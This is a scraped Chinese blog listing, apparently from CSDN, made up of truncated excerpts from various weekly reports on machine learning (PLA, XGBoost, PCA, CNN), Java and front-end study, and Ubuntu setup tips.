数据挖掘第流周周报 1、本周工作 本周主要是添加了PLA线性感知算法python版本,打算与神经网络、,KNN一起对数据处理,对测试集进行了分类,但是由于在PLA分类中,对于数据量太大的情况,对于PLA的权值更新有很大的阻碍,迟迟没办法收敛,我现控制一下权值迭代的次数,但是多次下来发现耗时太大,效果也不好,所以暂时没有用PLA作为分类。 W=np.ones(cols)#initial all weight with 1 count=0 while True: count.
第二学期第六周周报
passport404的博客
04-12 138
本周计划 1、java学习 2、学习树的相关知识。 3、二叉树的前后中序遍历 实现情况 1、java数据结构学习到集合框架,List接口及它的各种用法。 2、树学习了二叉树的前后中序遍历。 javaSE总结成果展示 下周计划 继续java数据结构的学习。 ...
第6周周报
WesternNight的博客
08-30 344
周工作总结及计划表 部    门 理工大学 姓    名 兰柳菲 入 职 时 间 7.18 本周已完成工作内容及总结    1.空调智能项目的室外机、统一设置、群组设置、计算基准页面    2.初步学习了html和css的基础知识    总结:在工作中应该有清晰的条理性和有秩序的排布,无论是
高级实训第六周周报
jimmywu123的博客
11-03 388
如上周周报所述,本周在之前的数据与处理和特征工程的基础上,用更复杂的模型代替KNN和决策树,并观察分类性能的提升。主要选用的是XGBoost和随机森林两个模型,理论部分在上周的周报中有提及,本次主要说明实际调参情况及结果分析。使用XGBoost模型获得的最好结果如下(相比两周前用决策树做到的0.6978有明显提升): 对XGBoost,我主要调整了一下4个参数: max_depth=6, 类似决策树的最大深度,过大易过拟合,过少易欠拟合,一般为5-10 learning_rate=0.1, 学习率
贷款违约预测第六周周报
zdxy921的博客
10-30 141
数据降维 上周主要是对已有模型做了调参处理,成绩大概比没调参上升了0.01分,所以要想继续上升,就只有对模型再进行处理了,所以接下来将会对模型进行降维处理。 这里的降维主要采用PCA降维方法,代码如下: 降维后对模型进行简单的测试: 发现成绩和没降维差不多,但是可能是参数没调整的原因,下周将会对降维后的模型参数进行调整。 成绩截图 ...
第一周周报
qq_52612197的博客
11-22 2509
第一周周报 这是学习前端的第一周,发现有好多东西都要慢慢来学习。 1.网页基本结构 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> &l
机器学习第六周周报
2301_77762389的博客
06-04 99
本周继续上周学习的“深度学习新的优化器”,继续比较各种算法之间的优劣。接下来开启了对卷积神经网络的学习,以图片分类为例,逐步发现问题,然后简化问题,最终解决问题,从而引出CNN的步骤,最终发现CNN在图像识别领域的应用十分广泛。
第六周工作周报1
08-08
【本周工作周报1】 本周的工作集中在7组的考生管理系统前端开发上,对接人方圆在2020年12月30日提交了本周的工作报告。主要工作内容包括: 1. **考生管理系统前端开发** - 本周的核心任务是完成该系统的前端部分,...
第六周周报0415-20192115641
08-08
《校园导览系统》项目的第六周周报展示了团队在地图构建、概要设计以及详细设计等方面取得的显著进展。以下是具体的知识点总结: 1. **算法与数据结构**: - **Dijkstra算法**:已完成100%的学习并移植到项目中,...
计科-编译原理课程设计-第9组-第6周周报1
08-03
在本次《编译原理与技术课程设计》的第9组第6周周报中,小组成员主要关注了从语法分析树到抽象语法树(AST)的转换、符号表的建立以及中间代码生成(AST转LLVM IR)的过程。以下是这些知识点的详细说明: 1. **语法...
机械设备行业第6周周报:制造业景气依旧,新兴制造业需求旺盛.pdf
07-11
机械设备行业第6周周报:制造业景气依旧,新兴制造业需求旺盛.pdf
汽车第6周周报:疫情短期冲击不改行业复苏态势.zip
10-17
这份名为“汽车第6周周报:疫情短期冲击不改行业复苏态势”的压缩包文件,主要聚焦于汽车行业在特定时间段(第6周)内受到新冠疫情的影响以及行业整体的复苏趋势。尽管遭受了短期的冲击,但汽车行业仍显示出积极的...
Ubuntu安装apex
yzqlyzql的博客
07-20 319
上面那个实在不行的话,就改成下面这个试试(我在pip >= 23.1,用上面的命令没有成功,但是用下面的成功了。ubuntu系统中的cuda版本需要和当前python环境中的一致,即使当前是python的虚拟环境。Ubuntu在使用apex官方的说明安装apex时或多或少会出现一些奇怪的问题,导致安装不上。的github网址为:https://github.com/NVIDIA/apex。
Ubuntu Grub引导优化
liwangjin0116的专栏
07-18 357
如果安装了双系统或多系统,可以考虑配置此参数。
ubuntu22.04,AX101网卡,打不开蓝牙
最新发布
qq_40397392的博客
07-23 135
安装完ubuntu 22.04后,发现蓝牙可以识别,但是打不开。查看/var/log/看了一下,确实没有ibt-1040-1050.sfi这个文件。最后重启电脑,再去打开蓝牙开关,发现就可以了。把0041对应的文件,拷贝到1050。然后安装 bluez。
ubuntu 24 PXE Server (bios+uefi) 批量部署系统
极致,细节
07-19 881
PXE(Preboot eXecution Environment,预启动执行环境)是一种网络启动协议,允许计算机通过网络启动而不是使用本地硬盘。PXE服务器是实现这一功能的服务器,它提供了启动镜像和引导加载程序,使得客户端计算机可以通过网络启动并安装操作系统或运行其他软件。TFTP服务器:用于提供启动镜像和引导加载程序。DHCP服务器:用于分配IP地址给客户端计算机。NFS或HTTP服务器:用于提供操作系统镜像和其他文件。atftpd。
编写一份Java电商项目的第二周周报
03-13
你好,以下是Java电商项目第二周的周报: 本周工作内容: 1. 完成了商品分类模块的数据库设计和代码编写; 2. 完成了商品列表展示模块的数据库设计和代码编写; 3. 完成了购物车模块的数据库设计和代码编写; 4. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值